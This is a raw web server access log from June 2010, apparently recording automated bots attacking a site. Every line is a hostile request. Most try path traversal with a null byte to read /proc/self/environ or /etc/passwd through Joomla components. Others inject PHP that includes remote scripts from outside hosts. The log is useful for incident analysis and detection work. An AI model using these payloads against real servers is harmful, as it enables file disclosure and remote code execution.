209.188.90.44 - - [06/Jun/2010:23:47:01 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:47:01 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.208.42 - - [06/Jun/2010:23:48:07 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
91.121.208.42 - - [06/Jun/2010:23:48:07 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.208.42 - - [06/Jun/2010:23:48:07 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
89.145.108.230 - - [06/Jun/2010:23:48:07 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:23:48:08 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:23:48:08 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
121.88.4.141 - - [06/Jun/2010:23:48:10 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.88.4.141 - - [06/Jun/2010:23:48:10 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [06/Jun/2010:23:48:11 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.167.132.200 - - [06/Jun/2010:23:48:31 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
69.167.132.200 - - [06/Jun/2010:23:48:31 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.167.132.200 - - [06/Jun/2010:23:48:31 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
209.188.90.44 - - [06/Jun/2010:23:49:02 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:49:02 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [06/Jun/2010:23:49:02 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
72.55.146.140 - - [06/Jun/2010:23:49:03 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:03 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:03 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.188.90.44 - - [06/Jun/2010:23:49:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
80.233.172.42 - - [06/Jun/2010:23:49:13 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
80.233.172.42 - - [06/Jun/2010:23:49:14 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
80.233.172.42 - - [06/Jun/2010:23:49:18 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.831"
72.55.146.140 - - [06/Jun/2010:23:49:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:49:34 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:49:35 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:49:35 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
72.55.146.140 - - [06/Jun/2010:23:49:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:49:37 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:49:41 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:49:42 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:49:42 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
121.88.4.141 - - [06/Jun/2010:23:49:51 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [06/Jun/2010:23:49:51 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.88.4.141 - - [06/Jun/2010:23:49:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.135.228.230 - - [06/Jun/2010:23:50:39 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
89.111.176.88 - - [06/Jun/2010:23:51:18 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.111.176.88 - - [06/Jun/2010:23:51:18 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.176.88 - - [06/Jun/2010:23:51:19 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:21 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.253.162.10 - - [06/Jun/2010:23:51:22 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.64.231 - - [06/Jun/2010:23:51:43 -0500] "GET //components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
174.121.20.138 - - [06/Jun/2010:23:51:44 -0500] "GET /logs//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
174.121.20.138 - - [06/Jun/2010:23:51:47 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.20.138 - - [06/Jun/2010:23:53:10 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:53:16 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:16 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:16 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:16 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:17 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:17 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:51 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:53:53 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
200.135.228.230 - - [06/Jun/2010:23:54:28 -0500] "GET /logs/access_log.1273363200//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
200.135.228.230 - - [06/Jun/2010:23:54:28 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
200.135.228.230 - - [06/Jun/2010:23:54:29 -0500] "GET /logs//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
173.160.141.237 - - [06/Jun/2010:23:54:49 -0500] "GET /logs/access_log.1273363200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
173.160.141.237 - - [06/Jun/2010:23:54:49 -0500] "GET ////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
173.160.141.237 - - [06/Jun/2010:23:54:49 -0500] "GET /logs////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
121.88.4.141 - - [06/Jun/2010:23:55:03 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.23.0.30 - - [06/Jun/2010:23:55:03 -0500] "GET /logs/access_log.1273363200//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.uoss.rs//includes/domit/id1.txt????? HTTP/1.1" 404 364 "-""Mozilla/5.0"
94.23.0.30 - - [06/Jun/2010:23:55:03 -0500] "GET //webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.uoss.rs//includes/domit/id1.txt????? HTTP/1.1" 404 337 "-""Mozilla/5.0"
94.23.0.30 - - [06/Jun/2010:23:55:03 -0500] "GET /logs//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.uoss.rs//includes/domit/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
188.72.70.56 - - [06/Jun/2010:23:55:21 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:55:23 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [06/Jun/2010:23:56:16 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [06/Jun/2010:23:56:17 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [06/Jun/2010:23:56:17 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
188.72.70.56 - - [06/Jun/2010:23:56:25 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:56:25 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:56:45 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:56:48 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:56:49 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
89.145.108.230 - - [06/Jun/2010:23:56:49 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
91.121.208.42 - - [06/Jun/2010:23:56:49 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
121.88.4.141 - - [06/Jun/2010:23:56:58 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
188.72.70.56 - - [06/Jun/2010:23:57:13 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:57:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
72.55.146.140 - - [06/Jun/2010:23:57:22 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:57:23 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.55.146.140 - - [06/Jun/2010:23:57:23 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.167.132.200 - - [06/Jun/2010:23:57:49 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
80.233.172.42 - - [06/Jun/2010:23:59:22 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.831"
188.72.70.56 - - [06/Jun/2010:23:59:25 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:59:25 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
87.253.162.10 - - [07/Jun/2010:00:00:03 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.253.162.10 - - [07/Jun/2010:00:00:11 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.111.176.88 - - [07/Jun/2010:00:01:08 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
188.72.70.56 - - [07/Jun/2010:00:02:49 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:02:49 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:02:50 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:02:50 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:02:50 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:02:50 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.121.20.138 - - [07/Jun/2010:00:02:51 -0500] "GET /logs/access_log.1273363200//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.810"
174.121.20.138 - - [07/Jun/2010:00:02:54 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.20.138 - - [07/Jun/2010:00:02:57 -0500] "GET /logs//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:00:03:19 -0500] "GET /logs/access_log.1274227200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:03:19 -0500] "GET /logs/access_log.1274227200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
173.160.141.237 - - [07/Jun/2010:00:04:12 -0500] "GET /logs/access_log.1223683200////comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mediabangladesh.net/en/news/crew.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
174.121.64.231 - - [07/Jun/2010:00:04:25 -0500] "GET /logs/access_log.1273017600//components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 339 "-""libwww-perl/5.810"
